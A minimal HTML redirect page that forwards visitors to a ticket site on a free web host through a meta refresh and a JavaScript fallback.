<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="refresh" content="0;url=https://ticketsforyou.000webhostapp.com/">
    <title>Redirecting...</title>
</head>
<body>
    <p>Please wait while you're redirected to the website...</p>
    <script>
        // Optionally, you can provide a fallback link in case the browser doesn't support meta refresh
        window.location.href = "https://ticketsforyou.000webhostapp.com/";
    </script>
</body>
</html>